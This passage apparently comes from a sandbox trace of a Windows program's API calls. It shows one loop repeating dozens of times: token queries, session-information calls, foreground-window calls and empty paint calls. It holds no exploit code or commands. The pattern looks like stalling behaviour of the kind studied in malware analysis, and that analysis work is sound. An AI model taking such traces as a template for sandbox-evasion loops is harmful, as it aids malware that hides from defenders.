(DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.819] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.819] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.819] TextOutW (hdc=0x0, x=4174, y=10199, lpString="", c=0) returned 1 [0072.819] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.819] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.819] GetTickCount () returned 0x1f4ab [0072.820] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.820] SetForegroundWindow (hWnd=0x0) returned 0 [0072.820] BringWindowToTop (hWnd=0x0) returned 0 [0072.820] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8bc) returned 1 [0072.820] GetTokenInformation (in: TokenHandle=0x8bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.820] GetLastError () returned 0x7a [0072.820] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.820] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.820] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.820] TextOutW (hdc=0x0, x=4184, y=10224, lpString="", c=0) returned 1 [0072.820] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.820] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.821] GetTickCount () returned 0x1f4ab [0072.821] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.821] SetForegroundWindow (hWnd=0x0) returned 0 [0072.821] BringWindowToTop (hWnd=0x0) returned 0 [0072.821] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8c0) returned 1 [0072.821] GetTokenInformation (in: TokenHandle=0x8c0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.821] GetLastError () returned 0x7a [0072.821] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.821] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.821] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.822] TextOutW (hdc=0x0, x=4194, y=10249, lpString="", c=0) returned 1 [0072.822] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.822] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.822] GetTickCount () returned 0x1f4ab [0072.822] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.822] SetForegroundWindow (hWnd=0x0) returned 0 [0072.822] BringWindowToTop (hWnd=0x0) returned 0 [0072.822] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8c4) returned 1 [0072.822] GetTokenInformation (in: TokenHandle=0x8c4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.822] GetLastError () returned 0x7a [0072.822] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.822] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.823] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.823] TextOutW (hdc=0x0, x=4204, y=10274, lpString="", c=0) returned 1 [0072.823] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.823] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.823] GetTickCount () returned 0x1f4ab [0072.823] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.823] SetForegroundWindow (hWnd=0x0) returned 0 [0072.823] BringWindowToTop (hWnd=0x0) returned 0 [0072.823] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8c8) returned 1 [0072.823] GetTokenInformation (in: TokenHandle=0x8c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.823] GetLastError () returned 0x7a [0072.823] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.823] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.824] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.824] TextOutW (hdc=0x0, x=4214, y=10299, lpString="", c=0) returned 1 [0072.824] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.824] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.824] GetTickCount () returned 0x1f4ab [0072.824] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.824] SetForegroundWindow (hWnd=0x0) returned 0 [0072.824] BringWindowToTop (hWnd=0x0) returned 0 [0072.824] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8cc) returned 1 [0072.824] GetTokenInformation (in: TokenHandle=0x8cc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.824] GetLastError () returned 0x7a [0072.824] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.824] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.825] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.825] TextOutW (hdc=0x0, x=4224, y=10324, lpString="", c=0) returned 1 [0072.825] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.825] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.825] GetTickCount () returned 0x1f4ab [0072.825] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.825] SetForegroundWindow (hWnd=0x0) returned 0 [0072.825] BringWindowToTop (hWnd=0x0) returned 0 [0072.825] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8d0) returned 1 [0072.825] GetTokenInformation (in: TokenHandle=0x8d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.825] GetLastError () returned 0x7a [0072.825] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.826] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.826] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.826] TextOutW (hdc=0x0, x=4234, y=10349, lpString="", c=0) returned 1 [0072.826] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.826] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.826] GetTickCount () returned 0x1f4ab [0072.826] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.826] SetForegroundWindow (hWnd=0x0) returned 0 [0072.826] BringWindowToTop (hWnd=0x0) returned 0 [0072.827] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8d4) returned 1 [0072.827] GetTokenInformation (in: TokenHandle=0x8d4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.827] GetLastError () returned 0x7a [0072.827] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.827] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.827] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.827] TextOutW (hdc=0x0, x=4244, y=10374, lpString="", c=0) returned 1 [0072.827] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.827] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.827] GetTickCount () returned 0x1f4ab [0072.827] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.828] SetForegroundWindow (hWnd=0x0) returned 0 [0072.828] BringWindowToTop (hWnd=0x0) returned 0 [0072.828] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8d8) returned 1 [0072.828] GetTokenInformation (in: TokenHandle=0x8d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.828] GetLastError () returned 0x7a [0072.828] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.828] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.828] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.828] TextOutW (hdc=0x0, x=4254, y=10399, lpString="", c=0) returned 1 [0072.828] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.828] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.828] GetTickCount () returned 0x1f4ab [0072.829] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.829] SetForegroundWindow (hWnd=0x0) returned 0 [0072.829] BringWindowToTop (hWnd=0x0) returned 0 [0072.829] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8dc) returned 1 [0072.829] GetTokenInformation (in: TokenHandle=0x8dc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.829] GetLastError () returned 0x7a [0072.829] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.829] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.829] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.829] TextOutW (hdc=0x0, x=4264, y=10424, lpString="", c=0) returned 1 [0072.829] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.829] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.829] GetTickCount () returned 0x1f4ab [0072.830] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.830] SetForegroundWindow (hWnd=0x0) returned 0 [0072.830] BringWindowToTop (hWnd=0x0) returned 0 [0072.830] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8e0) returned 1 [0072.830] GetTokenInformation (in: TokenHandle=0x8e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.830] GetLastError () returned 0x7a [0072.830] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.830] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.831] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.831] TextOutW (hdc=0x0, x=4274, y=10449, lpString="", c=0) returned 1 [0072.831] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.831] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.831] GetTickCount () returned 0x1f4bb [0072.832] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.832] SetForegroundWindow (hWnd=0x0) returned 0 [0072.832] BringWindowToTop (hWnd=0x0) returned 0 [0072.832] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8e4) returned 1 [0072.832] GetTokenInformation (in: TokenHandle=0x8e4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.832] GetLastError () returned 0x7a [0072.832] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.832] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.833] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.833] TextOutW (hdc=0x0, x=4284, y=10474, lpString="", c=0) returned 1 [0072.833] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.833] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.833] GetTickCount () returned 0x1f4bb [0072.833] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.833] SetForegroundWindow (hWnd=0x0) returned 0 [0072.833] BringWindowToTop (hWnd=0x0) returned 0 [0072.833] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8e8) returned 1 [0072.834] GetTokenInformation (in: TokenHandle=0x8e8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.834] GetLastError () returned 0x7a [0072.834] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.834] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.834] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.834] TextOutW (hdc=0x0, x=4294, y=10499, lpString="", c=0) returned 1 [0072.834] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.834] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.834] GetTickCount () returned 0x1f4bb [0072.834] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.834] SetForegroundWindow (hWnd=0x0) returned 0 [0072.835] BringWindowToTop (hWnd=0x0) returned 0 [0072.835] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8ec) returned 1 [0072.835] GetTokenInformation (in: TokenHandle=0x8ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.835] GetLastError () returned 0x7a [0072.835] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.835] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.835] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.835] TextOutW (hdc=0x0, x=4304, y=10524, lpString="", c=0) returned 1 [0072.835] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.835] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.835] GetTickCount () returned 0x1f4bb [0072.836] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.836] SetForegroundWindow (hWnd=0x0) returned 0 [0072.836] BringWindowToTop (hWnd=0x0) returned 0 [0072.836] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8f0) returned 1 [0072.836] GetTokenInformation (in: TokenHandle=0x8f0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.836] GetLastError () returned 0x7a [0072.836] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.836] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.837] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.837] TextOutW (hdc=0x0, x=4314, y=10549, lpString="", c=0) returned 1 [0072.837] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.837] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.837] GetTickCount () returned 0x1f4bb [0072.837] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.837] SetForegroundWindow (hWnd=0x0) returned 0 [0072.837] BringWindowToTop (hWnd=0x0) returned 0 [0072.837] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8f4) returned 1 [0072.837] GetTokenInformation (in: TokenHandle=0x8f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.837] GetLastError () returned 0x7a [0072.837] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.838] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.838] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.838] TextOutW (hdc=0x0, x=4324, y=10574, lpString="", c=0) returned 1 [0072.838] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.838] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.838] GetTickCount () returned 0x1f4bb [0072.839] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.839] SetForegroundWindow (hWnd=0x0) returned 0 [0072.839] BringWindowToTop (hWnd=0x0) returned 0 [0072.839] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8f8) returned 1 [0072.839] GetTokenInformation (in: TokenHandle=0x8f8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.839] GetLastError () returned 0x7a [0072.839] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.839] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.840] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.840] TextOutW (hdc=0x0, x=4334, y=10599, lpString="", c=0) returned 1 [0072.840] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.840] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.840] GetTickCount () returned 0x1f4bb [0072.840] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.840] SetForegroundWindow (hWnd=0x0) returned 0 [0072.841] BringWindowToTop (hWnd=0x0) returned 0 [0072.841] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x8fc) returned 1 [0072.841] GetTokenInformation (in: TokenHandle=0x8fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.841] GetLastError () returned 0x7a [0072.841] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.841] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.841] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.841] TextOutW (hdc=0x0, x=4344, y=10624, lpString="", c=0) returned 1 [0072.841] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.841] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.841] GetTickCount () returned 0x1f4bb [0072.842] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.842] SetForegroundWindow (hWnd=0x0) returned 0 [0072.842] BringWindowToTop (hWnd=0x0) returned 0 [0072.842] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x900) returned 1 [0072.842] GetTokenInformation (in: TokenHandle=0x900, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.842] GetLastError () returned 0x7a [0072.842] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.842] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.843] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.843] TextOutW (hdc=0x0, x=4354, y=10649, lpString="", c=0) returned 1 [0072.843] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.843] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.843] GetTickCount () returned 0x1f4bb [0072.843] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.844] SetForegroundWindow (hWnd=0x0) returned 0 [0072.844] BringWindowToTop (hWnd=0x0) returned 0 [0072.844] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x904) returned 1 [0072.844] GetTokenInformation (in: TokenHandle=0x904, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.844] GetLastError () returned 0x7a [0072.844] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.844] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.844] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.844] TextOutW (hdc=0x0, x=4364, y=10674, lpString="", c=0) returned 1 [0072.844] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.844] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.844] GetTickCount () returned 0x1f4bb [0072.845] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.845] SetForegroundWindow (hWnd=0x0) returned 0 [0072.845] BringWindowToTop (hWnd=0x0) returned 0 [0072.845] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x908) returned 1 [0072.845] GetTokenInformation (in: TokenHandle=0x908, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.845] GetLastError () returned 0x7a [0072.845] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.845] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.846] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.846] TextOutW (hdc=0x0, x=4374, y=10699, lpString="", c=0) returned 1 [0072.846] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) 